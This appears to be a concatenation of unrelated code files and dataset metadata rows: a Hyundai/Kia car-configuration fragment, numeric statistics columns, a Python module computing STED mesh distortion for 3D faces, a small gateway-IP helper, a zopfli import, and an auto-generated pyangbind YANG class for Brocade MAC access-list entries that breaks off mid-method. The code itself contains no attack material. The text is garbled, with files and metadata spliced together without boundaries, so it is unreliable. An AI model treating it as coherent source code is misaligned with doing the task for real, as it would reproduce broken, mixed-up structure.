"use_cluster_gears": [CAR.ELANTRA, CAR.KONA, CAR.ELANTRA_GT_I30], # Use Cluster for Gear Selection, rather than Transmission
"use_tcu_gears": [CAR.KIA_OPTIMA, CAR.SONATA_2019], # Use TCU Message for Gear Selection
"use_elect_gears": [CAR.KIA_OPTIMA_H, CAR.KONA_EV, CAR.GRANDEUR_H_19, CAR.GRANDEUR_H_20, CAR.IONIQ_EV, CAR.NIRO_HEV, CAR.NIRO_EV], # Use TCU Message for Gear Selection
}
EV_HYBRID = [CAR.KONA_EV,CAR.GRANDEUR_H_19, CAR.GRANDEUR_H_20, CAR.IONIQ_EV,CAR.NIRO_HEV, CAR.NIRO_EV]
DBC = {
CAR.ELANTRA: dbc_dict('hyundai_kia_generic', None),
CAR.ELANTRA_GT_I30: dbc_dict('hyundai_kia_generic', None),
CAR.GENESIS_G80: dbc_dict('hyundai_kia_generic', None),
CAR.GENESIS_G90: dbc_dict('hyundai_kia_generic', None),
CAR.HYUNDAI_GENESIS: dbc_dict('hyundai_kia_generic', None),
CAR.KIA_FORTE: dbc_dict('hyundai_kia_generic', None),
CAR.KIA_OPTIMA: dbc_dict('hyundai_kia_generic', None),
CAR.KIA_OPTIMA_H: dbc_dict('hyundai_kia_generic', None),
CAR.KIA_SORENTO: dbc_dict('hyundai_kia_generic', None),
CAR.KIA_STINGER: dbc_dict('hyundai_kia_generic', None),
CAR.KONA: dbc_dict('hyundai_kia_generic', None),
CAR.KONA_EV: dbc_dict('hyundai_kia_generic', None),
CAR.SANTA_FE: dbc_dict('hyundai_kia_generic', None),
CAR.SONATA: dbc_dict('hyundai_kia_generic', None),
CAR.SONATA_2019: dbc_dict('hyundai_kia_generic', None),
CAR.PALISADE: dbc_dict('hyundai_kia_generic', None),
CAR.GRANDEUR_H_19: dbc_dict('hyundai_kia_generic', None),
CAR.GRANDEUR_H_20: dbc_dict('hyundai_kia_generic', None),
CAR.IONIQ_EV: dbc_dict('hyundai_kia_generic', None),
CAR.NIRO_HEV: dbc_dict('hyundai_kia_generic', None),
CAR.NIRO_EV: dbc_dict('hyundai_kia_generic', None),
}
STEER_THRESHOLD = 700
| 77.654822
| 505
| 0.575827
| 3,085
| 15,298
| 2.795462
| 0.076823
| 0.012523
| 0.021916
| 0.025046
| 0.752319
| 0.740608
| 0.72878
| 0.707908
| 0.658395
| 0.639842
| 0
| 0.496052
| 0.221859
| 15,298
| 196
| 506
| 78.05102
| 0.228411
| 0.011439
| 0
| 0.148936
| 0
| 0.014184
| 0.219908
| 0.025441
| 0
| 0
| 0.00477
| 0
| 0
| 1
| 0
| false
| 0
| 0.021277
| 0
| 0.276596
| 0.007092
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
fb4ed96d5ab6b8c4272869f05af4df76886a92f1
| 6,297
|
py
|
Python
|
STED/sted_compute.py
|
QianyiWu/DR-Learning-for-3D-Face
|
fee8931e9bed5c1e3f69c290783fcaf4bcf967c9
|
[
"MIT"
] | 1
|
2019-12-24T12:39:24.000Z
|
2019-12-24T12:39:24.000Z
|
STED/sted_compute.py
|
QianyiWu/DR-Learning-for-3D-Face
|
fee8931e9bed5c1e3f69c290783fcaf4bcf967c9
|
[
"MIT"
] | null | null | null |
STED/sted_compute.py
|
QianyiWu/DR-Learning-for-3D-Face
|
fee8931e9bed5c1e3f69c290783fcaf4bcf967c9
|
[
"MIT"
] | null | null | null |
'''
This file include some functions for STED distance computation
'''
import numpy as np
import pickle
import math
import time
import openmesh as om
with open('edgelist.pkl', 'rb') as f:
edge_list = pickle.load(f)
with open('velist.pkl', 'rb') as f:
vertex_edge_list = pickle.load(f)
def sted_compute(src_point_array, tar_point_array):
'''
point_array: store the coordinate of point, size should be nver*3
-- src_point_array: source point array / origin mesh
-- tar_point_array: target point array / distorted mesh
'''
with open('edgelist.pkl', 'rb') as f:
edge_list = pickle.load(f)
src_el=[]
tar_el=[]
t = time.time()
# compute edge length of src_mesh and tar_mesh.
# This part should be accerated
src_el = np.array([np.sqrt(np.sum(np.square(src_point_array[ele[0], :]-src_point_array[ele[1], :]))) for ele in edge_list])
tar_el = np.array([np.sqrt(np.sum(np.square(tar_point_array[ele[0], :]-tar_point_array[ele[1], :]))) for ele in edge_list])
# for ele in edge_list:
# src_el.append(np.sqrt(np.sum(np.square(src_point_array[ele[0], :]-src_point_array[ele[1], :]))))
# tar_el.append(np.sqrt(np.sum(np.square(tar_point_array[ele[0], :]-tar_point_array[ele[1], :]))))
# src_el= np.array(src_el)
# tar_el= np.array(tar_el)
# print('edge time cost {}'.format(time.time()-t))
# compute relative edge difference, ed
ed = np.abs(src_el-tar_el)/src_el
# compute weights of edge
with open('velist.pkl', 'rb') as f:
vertex_edge_list = pickle.load(f)
dev=0
for ve in vertex_edge_list:
weight_array = src_el[ve]
sum_el = np.sum(weight_array)
weight_array = weight_array/sum_el
sub_ed_array = ed[ve]
avged = np.average(sub_ed_array, weights=weight_array)
vared = np.square(sub_ed_array-avged)
dev= dev+math.sqrt(np.average(vared, weights= weight_array))
return dev/src_point_array.shape[0]
def sted_compute_advanced_back(src_point_array, tar_point_array):
'''
point_array: store the coordinate of point, size should be nver*3
-- src_point_array: source point array / origin mesh
-- tar_point_array: target point array / distorted mesh
'''
# with open('edgelist.pkl', 'rb') as f:
# edge_list = pickle.load(f)
src_el=[]
tar_el=[]
# compute edge length of src_mesh and tar_mesh.
# This part should be accerated
src_el = np.array([np.sqrt(np.sum(np.square(src_point_array[ele[0], :]-src_point_array[ele[1], :]))) for ele in edge_list])
tar_el = np.array([np.sqrt(np.sum(np.square(tar_point_array[ele[0], :]-tar_point_array[ele[1], :]))) for ele in edge_list])
# for ele in edge_list:
# src_el.append(np.sqrt(np.sum(np.square(src_point_array[ele[0], :]-src_point_array[ele[1], :]))))
# tar_el.append(np.sqrt(np.sum(np.square(tar_point_array[ele[0], :]-tar_point_array[ele[1], :]))))
# src_el= np.array(src_el)
# tar_el= np.array(tar_el)
# print('edge time cost {}'.format(time.time()-t))
# compute relative edge difference, ed
ed = np.abs(src_el-tar_el)/src_el
# compute weights of edge
# with open('velist.pkl', 'rb') as f:
# vertex_edge_list = pickle.load(f)
dev=0
for ve in vertex_edge_list:
weight_array = src_el[ve]
sum_el = np.sum(weight_array)
weight_array = weight_array/sum_el
sub_ed_array = ed[ve]
avged = np.average(sub_ed_array, weights=weight_array)
vared = np.square(sub_ed_array-avged)
dev= dev+math.sqrt(np.average(vared, weights= weight_array))
return dev/src_point_array.shape[0]
def sted_compute_advanced(src_point_array, tar_point_array):
'''
point_array: store the coordinate of point, size should be nver*3
-- src_point_array: source point array / origin mesh
-- tar_point_array: target point array / distorted mesh
'''
# with open('edgelist.pkl', 'rb') as f:
# edge_list = pickle.load(f)
src_el=[]
tar_el=[]
# compute edge length of src_mesh and tar_mesh.
# This part should be accerated
src_el = np.array([np.sqrt(np.sum(np.square(src_point_array[ele[0], :]-src_point_array[ele[1], :]))) for ele in edge_list])
tar_el = np.array([np.sqrt(np.sum(np.square(tar_point_array[ele[0], :]-tar_point_array[ele[1], :]))) for ele in edge_list])
# for ele in edge_list:
# src_el.append(np.sqrt(np.sum(np.square(src_point_array[ele[0], :]-src_point_array[ele[1], :]))))
# tar_el.append(np.sqrt(np.sum(np.square(tar_point_array[ele[0], :]-tar_point_array[ele[1], :]))))
# src_el= np.array(src_el)
# tar_el= np.array(tar_el)
# print('edge time cost {}'.format(time.time()-t))
per_vertex_sted=[]
# compute relative edge difference, ed
ed = np.abs(src_el-tar_el)/src_el
# compute weights of edge
# with open('velist.pkl', 'rb') as f:
# vertex_edge_list = pickle.load(f)
dev=0
for ve in vertex_edge_list:
weight_array = src_el[ve]
sum_el = np.sum(weight_array)
weight_array = weight_array/sum_el
sub_ed_array = ed[ve]
avged = np.average(sub_ed_array, weights=weight_array)
vared = np.square(sub_ed_array-avged)
vertex_sted=math.sqrt(np.average(vared, weights= weight_array))
per_vertex_sted.append(vertex_sted)
#dev= dev+math.sqrt(np.average(vared, weights= weight_array))
dev= dev+vertex_sted
return dev/src_point_array.shape[0], per_vertex_sted
def cal_sted_loss_in_file(tar_file_format, src_file_format = '/raid/jzh/CVPR2019/alignpose/Tester_{}/AlignPose/pose_{}.obj',vis = False):
average_p_loss = []
for j in range(141,151):
for i in range(47):
tar_mesh = om.read_trimesh(tar_file_format.format(j,i))
src_mesh = om.read_trimesh(src_file_format.format(j,i))
src_point=src_mesh.points()
tar_point=tar_mesh.points()
p_loss, _ = sted_compute_advanced(src_point, tar_point)
#print(np.array(sted_array).astype(np.float64)[:3])
#np.savetxt((tar_file_format[:-4]+'.txt').format(j,i), sted_array)
average_p_loss.append(p_loss)
if vis:
print('people:{} exp: {}, STED {:9.6f}'.format(j, i, p_loss))
print('Average loss: {}'.format(np.mean(average_p_loss)))
print('median loss: {}'.format(np.median(average_p_loss)))
print('extreme differ: {}'.format(np.max(np.abs(np.array(average_p_loss) - np.mean(average_p_loss)))))
return average_p_loss
| 38.631902
| 137
| 0.686517
| 1,059
| 6,297
| 3.83475
| 0.11237
| 0.118197
| 0.076828
| 0.032504
| 0.817779
| 0.802265
| 0.791923
| 0.785028
| 0.775179
| 0.775179
| 0
| 0.009687
| 0.163888
| 6,297
| 162
| 138
| 38.87037
| 0.761633
| 0.386533
| 0
| 0.62963
| 0
| 0
| 0.05074
| 0.015856
| 0
| 0
| 0
| 0
| 0
| 1
| 0.049383
| false
| 0
| 0.061728
| 0
| 0.160494
| 0.049383
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
fb504188588e56e557bc9621aee77f8d39adb921
| 183
|
py
|
Python
|
network.py
|
jjbayer/kaast
|
801b9bfe278d87d4ed4a537229e42e635d036ab9
|
[
"MIT"
] | null | null | null |
network.py
|
jjbayer/kaast
|
801b9bfe278d87d4ed4a537229e42e635d036ab9
|
[
"MIT"
] | null | null | null |
network.py
|
jjbayer/kaast
|
801b9bfe278d87d4ed4a537229e42e635d036ab9
|
[
"MIT"
] | null | null | null |
import netifaces
def get_own_ip():
_, interface = netifaces.gateways()['default'][netifaces.AF_INET]
return netifaces.ifaddresses(interface)[netifaces.AF_INET][0]['addr']
| 20.333333
| 73
| 0.73224
| 22
| 183
| 5.863636
| 0.681818
| 0.27907
| 0.232558
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006211
| 0.120219
| 183
| 8
| 74
| 22.875
| 0.795031
| 0
| 0
| 0
| 0
| 0
| 0.060109
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.25
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
fb7c5cb40feb83c0ef7b26534d9a2e8b313b7b1a
| 21
|
py
|
Python
|
tools/zopfli/__init__.py
|
cahirwpz/ghostown-sushiboyz
|
aabbbeded37ad49e5055190009e6a4f79637d32c
|
[
"Artistic-2.0"
] | 2
|
2020-05-23T14:40:20.000Z
|
2020-05-26T20:36:23.000Z
|
tools/zopfli/__init__.py
|
cahirwpz/ghostown-sushiboyz
|
aabbbeded37ad49e5055190009e6a4f79637d32c
|
[
"Artistic-2.0"
] | null | null | null |
tools/zopfli/__init__.py
|
cahirwpz/ghostown-sushiboyz
|
aabbbeded37ad49e5055190009e6a4f79637d32c
|
[
"Artistic-2.0"
] | 1
|
2020-08-23T17:24:53.000Z
|
2020-08-23T17:24:53.000Z
|
from zopfli import *
| 10.5
| 20
| 0.761905
| 3
| 21
| 5.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.190476
| 21
| 1
| 21
| 21
| 0.941176
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
fbd9137ed54efee83562f600bf598eed4b23ff9c
| 28,588
|
py
|
Python
|
pybind/slxos/v17s_1_02/mac/access_list/standard/hide_mac_acl_std/seq/__init__.py
|
extremenetworks/pybind
|
44c467e71b2b425be63867aba6e6fa28b2cfe7fb
|
[
"Apache-2.0"
] | null | null | null |
pybind/slxos/v17s_1_02/mac/access_list/standard/hide_mac_acl_std/seq/__init__.py
|
extremenetworks/pybind
|
44c467e71b2b425be63867aba6e6fa28b2cfe7fb
|
[
"Apache-2.0"
] | null | null | null |
pybind/slxos/v17s_1_02/mac/access_list/standard/hide_mac_acl_std/seq/__init__.py
|
extremenetworks/pybind
|
44c467e71b2b425be63867aba6e6fa28b2cfe7fb
|
[
"Apache-2.0"
] | 1
|
2021-11-05T22:15:42.000Z
|
2021-11-05T22:15:42.000Z
|
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
class seq(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-mac-access-list - based on the path /mac/access-list/standard/hide-mac-acl-std/seq. Each member element of
the container is represented as a class variable - with a specific
YANG type.
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__seq_id','__action','__source','__srchost','__src_mac_addr_mask','__count','__log','__copy_sflow',)
_yang_name = 'seq'
_rest_name = 'seq'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__count = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="count", rest_name="count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Packet count', u'cli-optional-in-sequence': None, u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='empty', is_config=True)
self.__log = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="log", rest_name="log", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Log Packet', u'cli-optional-in-sequence': None, u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='empty', is_config=True)
self.__srchost = YANGDynClass(base=unicode, is_leaf=True, yang_name="srchost", rest_name="srchost", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-drop-node-name': None, u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='mac-address-type', is_config=True)
self.__seq_id = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), restriction_dict={'range': [u'0 .. 4294967290']}), is_leaf=True, yang_name="seq-id", rest_name="seq-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='uint64', is_config=True)
self.__source = YANGDynClass(base=[unicode,RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'host': {'value': 2}, u'any': {'value': 1}},),], is_leaf=True, yang_name="source", rest_name="source", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-drop-node-name': None, u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='union', is_config=True)
self.__copy_sflow = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="copy-sflow", rest_name="copy-sflow", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'cli-optional-in-sequence': None, u'hidden': u'full', u'info': u'Copy to sFlow Collector', u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='empty', is_config=True)
self.__src_mac_addr_mask = YANGDynClass(base=unicode, is_leaf=True, yang_name="src-mac-addr-mask", rest_name="src-mac-addr-mask", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-drop-node-name': None, u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='src-dst-mac-address-mask-type', is_config=True)
self.__action = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'deny': {'value': 2}, u'hard-drop': {'value': 3}, u'permit': {'value': 1}},), is_leaf=True, yang_name="action", rest_name="action", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-drop-node-name': None, u'cli-incomplete-command': None, u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='enumeration', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'mac', u'access-list', u'standard', u'hide-mac-acl-std', u'seq']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'mac', u'access-list', u'standard', u'seq']
def _get_seq_id(self):
"""
Getter method for seq_id, mapped from YANG variable /mac/access_list/standard/hide_mac_acl_std/seq/seq_id (uint64)
"""
return self.__seq_id
def _set_seq_id(self, v, load=False):
"""
Setter method for seq_id, mapped from YANG variable /mac/access_list/standard/hide_mac_acl_std/seq/seq_id (uint64)
If this variable is read-only (config: false) in the
source YANG file, then _set_seq_id is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_seq_id() directly.
"""
parent = getattr(self, "_parent", None)
if parent is not None and load is False:
raise AttributeError("Cannot set keys directly when" +
" within an instantiated list")
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), restriction_dict={'range': [u'0 .. 4294967290']}), is_leaf=True, yang_name="seq-id", rest_name="seq-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='uint64', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """seq_id must be of a type compatible with uint64""",
'defined-type': "uint64",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), restriction_dict={'range': [u'0 .. 4294967290']}), is_leaf=True, yang_name="seq-id", rest_name="seq-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='uint64', is_config=True)""",
})
self.__seq_id = t
if hasattr(self, '_set'):
self._set()
def _unset_seq_id(self):
self.__seq_id = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), restriction_dict={'range': [u'0 .. 4294967290']}), is_leaf=True, yang_name="seq-id", rest_name="seq-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='uint64', is_config=True)
def _get_action(self):
"""
Getter method for action, mapped from YANG variable /mac/access_list/standard/hide_mac_acl_std/seq/action (enumeration)
"""
return self.__action
def _set_action(self, v, load=False):
"""
Setter method for action, mapped from YANG variable /mac/access_list/standard/hide_mac_acl_std/seq/action (enumeration)
If this variable is read-only (config: false) in the
source YANG file, then _set_action is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_action() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'deny': {'value': 2}, u'hard-drop': {'value': 3}, u'permit': {'value': 1}},), is_leaf=True, yang_name="action", rest_name="action", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-drop-node-name': None, u'cli-incomplete-command': None, u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='enumeration', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """action must be of a type compatible with enumeration""",
'defined-type': "brocade-mac-access-list:enumeration",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'deny': {'value': 2}, u'hard-drop': {'value': 3}, u'permit': {'value': 1}},), is_leaf=True, yang_name="action", rest_name="action", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-drop-node-name': None, u'cli-incomplete-command': None, u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='enumeration', is_config=True)""",
})
self.__action = t
if hasattr(self, '_set'):
self._set()
def _unset_action(self):
self.__action = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'deny': {'value': 2}, u'hard-drop': {'value': 3}, u'permit': {'value': 1}},), is_leaf=True, yang_name="action", rest_name="action", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-drop-node-name': None, u'cli-incomplete-command': None, u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='enumeration', is_config=True)
def _get_source(self):
"""
Getter method for source, mapped from YANG variable /mac/access_list/standard/hide_mac_acl_std/seq/source (union)
"""
return self.__source
def _set_source(self, v, load=False):
"""
Setter method for source, mapped from YANG variable /mac/access_list/standard/hide_mac_acl_std/seq/source (union)
If this variable is read-only (config: false) in the
source YANG file, then _set_source is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_source() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=[unicode,RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'host': {'value': 2}, u'any': {'value': 1}},),], is_leaf=True, yang_name="source", rest_name="source", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-drop-node-name': None, u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='union', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """source must be of a type compatible with union""",
'defined-type': "brocade-mac-access-list:union",
'generated-type': """YANGDynClass(base=[unicode,RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'host': {'value': 2}, u'any': {'value': 1}},),], is_leaf=True, yang_name="source", rest_name="source", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-drop-node-name': None, u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='union', is_config=True)""",
})
self.__source = t
if hasattr(self, '_set'):
self._set()
def _unset_source(self):
self.__source = YANGDynClass(base=[unicode,RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'host': {'value': 2}, u'any': {'value': 1}},),], is_leaf=True, yang_name="source", rest_name="source", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-drop-node-name': None, u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='union', is_config=True)
def _get_srchost(self):
"""
Getter method for srchost, mapped from YANG variable /mac/access_list/standard/hide_mac_acl_std/seq/srchost (mac-address-type)
"""
return self.__srchost
def _set_srchost(self, v, load=False):
"""
Setter method for srchost, mapped from YANG variable /mac/access_list/standard/hide_mac_acl_std/seq/srchost (mac-address-type)
If this variable is read-only (config: false) in the
source YANG file, then _set_srchost is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_srchost() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="srchost", rest_name="srchost", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-drop-node-name': None, u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='mac-address-type', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """srchost must be of a type compatible with mac-address-type""",
'defined-type': "brocade-mac-access-list:mac-address-type",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="srchost", rest_name="srchost", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-drop-node-name': None, u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='mac-address-type', is_config=True)""",
})
self.__srchost = t
if hasattr(self, '_set'):
self._set()
def _unset_srchost(self):
self.__srchost = YANGDynClass(base=unicode, is_leaf=True, yang_name="srchost", rest_name="srchost", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-drop-node-name': None, u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='mac-address-type', is_config=True)
def _get_src_mac_addr_mask(self):
"""
Getter method for src_mac_addr_mask, mapped from YANG variable /mac/access_list/standard/hide_mac_acl_std/seq/src_mac_addr_mask (src-dst-mac-address-mask-type)
"""
return self.__src_mac_addr_mask
def _set_src_mac_addr_mask(self, v, load=False):
"""
Setter method for src_mac_addr_mask, mapped from YANG variable /mac/access_list/standard/hide_mac_acl_std/seq/src_mac_addr_mask (src-dst-mac-address-mask-type)
If this variable is read-only (config: false) in the
source YANG file, then _set_src_mac_addr_mask is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_src_mac_addr_mask() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="src-mac-addr-mask", rest_name="src-mac-addr-mask", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-drop-node-name': None, u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='src-dst-mac-address-mask-type', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """src_mac_addr_mask must be of a type compatible with src-dst-mac-address-mask-type""",
'defined-type': "brocade-mac-access-list:src-dst-mac-address-mask-type",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="src-mac-addr-mask", rest_name="src-mac-addr-mask", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-drop-node-name': None, u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='src-dst-mac-address-mask-type', is_config=True)""",
})
